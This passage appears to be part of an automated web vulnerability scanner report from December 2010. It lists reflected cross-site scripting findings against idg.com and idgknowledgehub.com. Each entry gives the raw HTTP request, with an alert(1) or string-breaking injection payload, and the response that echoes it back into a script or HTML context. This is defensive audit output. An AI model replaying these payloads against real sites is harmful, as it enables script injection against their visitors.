<a href="/action/login.do?successUrl=/?7c83c"><script>alert(1)</script>4bfa1b85fda=1">
...[SNIP]...

2.313. http://www.idg.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7742"-alert(1)-"4b74e385f1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. The reflection occurs in the body of the 400 Bad Request error page; browsers render error responses as ordinary documents, so the status code does not prevent the injected script from executing.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?d7742"-alert(1)-"4b74e385f1e=1 HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:24:07 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf?d7742"-alert(1)-"4b74e385f1e=1");
} catch(err) {}</script>
...[SNIP]...

2.314. http://www.idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/HomeNew.nsf/docs/U.S._Sales

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 788d4"%3b3db035d407f was submitted in the REST URL parameter 1. This input was echoed as 788d4";3db035d407f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the same _trackPageview() sink on this path is reached with a full proof of concept through the name of a query-string parameter in 2.317, so the sink itself is exploitable; only the request-path vector was not confirmed.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www788d4"%3b3db035d407f/HomeNew.nsf/docs/U.S._Sales HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:24:03 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www788d4";3db035d407f/HomeNew.nsf/docs/U.S._Sales");
} catch(err) {}</script>
...[SNIP]...

2.315. http://www.idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/HomeNew.nsf/docs/U.S._Sales

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c921"%3b457004f577f was submitted in the REST URL parameter 3. This input was echoed as 2c921";457004f577f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs2c921"%3b457004f577f/U.S._Sales HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:24:17 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs2c921";457004f577f/U.S._Sales");
} catch(err) {}</script>
...[SNIP]...

2.316. http://www.idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/HomeNew.nsf/docs/U.S._Sales

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac956"%3bb0523ff90b0 was submitted in the REST URL parameter 4. This input was echoed as ac956";b0523ff90b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/U.S._Salesac956"%3bb0523ff90b0 HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:24:20 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/U.S._Salesac956";b0523ff90b0");
} catch(err) {}</script>
...[SNIP]...

2.317. http://www.idg.com/www/HomeNew.nsf/docs/U.S._Sales [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/HomeNew.nsf/docs/U.S._Sales

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acacf"-alert(1)-"9d1688cc828 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/U.S._Sales?acacf"-alert(1)-"9d1688cc828=1 HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:23:54 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5032
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/U.S._Sales?acacf"-alert(1)-"9d1688cc828=1");
} catch(err) {}</script>
...[SNIP]...

2.318. http://www.idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/HomeNew.nsf/docs/about_IDG

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 215b0"%3ba214fe83243 was submitted in the REST URL parameter 1. This input was echoed as 215b0";a214fe83243 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www215b0"%3ba214fe83243/HomeNew.nsf/docs/about_IDG HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:23:51 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5018
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www215b0";a214fe83243/HomeNew.nsf/docs/about_IDG");
} catch(err) {}</script>
...[SNIP]...

2.319. http://www.idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/HomeNew.nsf/docs/about_IDG

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70cc4"%3bd9b78be8f40 was submitted in the REST URL parameter 3. This input was echoed as 70cc4";d9b78be8f40 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs70cc4"%3bd9b78be8f40/about_IDG HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:23:54 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5018
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs70cc4";d9b78be8f40/about_IDG");
} catch(err) {}</script>
...[SNIP]...

2.320. http://www.idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/HomeNew.nsf/docs/about_IDG

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 377cf"%3b2780271a98a was submitted in the REST URL parameter 4. This input was echoed as 377cf";2780271a98a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/about_IDG377cf"%3b2780271a98a HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:23:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5018
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/about_IDG377cf";2780271a98a");
} catch(err) {}</script>
...[SNIP]...

2.321. http://www.idg.com/www/HomeNew.nsf/docs/about_IDG [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/HomeNew.nsf/docs/about_IDG

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4365e"-alert(1)-"1d7117f9b61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/about_IDG?4365e"-alert(1)-"1d7117f9b61=1 HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:23:44 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5031
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/about_IDG?4365e"-alert(1)-"1d7117f9b61=1");
} catch(err) {}</script>
...[SNIP]...

2.322. http://www.idg.com/www/idgdir.nsf/ContactSearch [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/idgdir.nsf/ContactSearch

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d12fe"%3b1936f8b7000 was submitted in the REST URL parameter 1. This input was echoed as d12fe";1936f8b7000 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwd12fe"%3b1936f8b7000/idgdir.nsf/ContactSearch HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:23:33 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwd12fe";1936f8b7000/idgdir.nsf/ContactSearch");
} catch(err) {}</script>
...[SNIP]...

2.323. http://www.idg.com/www/idgdir.nsf/ContactSearch [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/idgdir.nsf/ContactSearch

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6aa5"%3bc354528816a was submitted in the REST URL parameter 3. This input was echoed as c6aa5";c354528816a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgdir.nsf/ContactSearchc6aa5"%3bc354528816a HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:23:35 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgdir.nsf/ContactSearchc6aa5";c354528816a");
} catch(err) {}</script>
...[SNIP]...

2.324. http://www.idg.com/www/idgdir.nsf/ContactSearch [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/idgdir.nsf/ContactSearch

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f109"><script>alert(1)</script>0b5f290174a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www/idgdir.nsf/ContactSearch?readForm&8f109"><script>alert(1)</script>0b5f290174a=1 HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:23:36 GMT
Connection: close
Last-Modified: Thu, 16 Dec 2010 13:23:35 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 14262
Cache-control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IDG.com: Contact Us
...[SNIP]...
<input name="QUERY_STRING" id="QUERY_STRING" type="hidden" value="readForm&8f109"><script>alert(1)</script>0b5f290174a=1">
...[SNIP]...

2.325. http://www.idg.com/www/idgdir.nsf/ContactSearch [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/idgdir.nsf/ContactSearch

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de40f"-alert(1)-"5bd5d0eb955 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgdir.nsf/ContactSearch?de40f"-alert(1)-"5bd5d0eb955=1 HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:23:29 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5029
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgdir.nsf/ContactSearch?de40f"-alert(1)-"5bd5d0eb955=1");
} catch(err) {}</script>
...[SNIP]...

2.326. http://www.idg.com/www/idgdir.nsf/ContactSearch [readForm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/idgdir.nsf/ContactSearch

Issue detail

The value of the readForm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 999aa"-alert(1)-"1378acd8a25 was submitted in the readForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgdir.nsf/ContactSearch?readForm999aa"-alert(1)-"1378acd8a25 HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:23:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5035
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgdir.nsf/ContactSearch?readForm999aa"-alert(1)-"1378acd8a25");
} catch(err) {}</script>
...[SNIP]...

2.327. http://www.idg.com/www/pr.nsf/pr_rss [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/pr.nsf/pr_rss

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba745"%3b6e7bf86569e was submitted in the REST URL parameter 1. This input was echoed as ba745";6e7bf86569e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwba745"%3b6e7bf86569e/pr.nsf/pr_rss HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:23:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5005
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwba745";6e7bf86569e/pr.nsf/pr_rss");
} catch(err) {}</script>
...[SNIP]...

2.328. http://www.idg.com/www/pr.nsf/pr_rss [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/pr.nsf/pr_rss

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52fb7"%3b361197f22a2 was submitted in the REST URL parameter 3. This input was echoed as 52fb7";361197f22a2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/pr.nsf/pr_rss52fb7"%3b361197f22a2 HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:24:09 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5005
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/pr_rss52fb7";361197f22a2");
} catch(err) {}</script>
...[SNIP]...

2.329. http://www.idg.com/www/pr.nsf/pr_rss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/pr.nsf/pr_rss

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 134a0"-alert(1)-"7ba533571c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/pr.nsf/pr_rss?134a0"-alert(1)-"7ba533571c6=1 HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:23:42 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5018
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/pr_rss?134a0"-alert(1)-"7ba533571c6=1");
} catch(err) {}</script>
...[SNIP]...

2.330. http://www.idgknowledgehub.com/blogs/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idgknowledgehub.com
Path:   /blogs/

Issue detail

The value of the cat request parameter is copied into the HTML document as plain text between tags. The payload b5964<script>alert(1)</script>40a9d0fc7f1 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/?cat=1b5964<script>alert(1)</script>40a9d0fc7f1 HTTP/1.1
Host: www.idgknowledgehub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=a2d74e9-12cef22fc96-63603bda-9; __utmz=163783655.1292502236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163783655.938968462.1292502236.1292502236.1292504918.2; __utmc=163783655; __qca=P0-34259952-1292504918745; __utmb=163783655.8.10.1292504918;

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:24:59 GMT
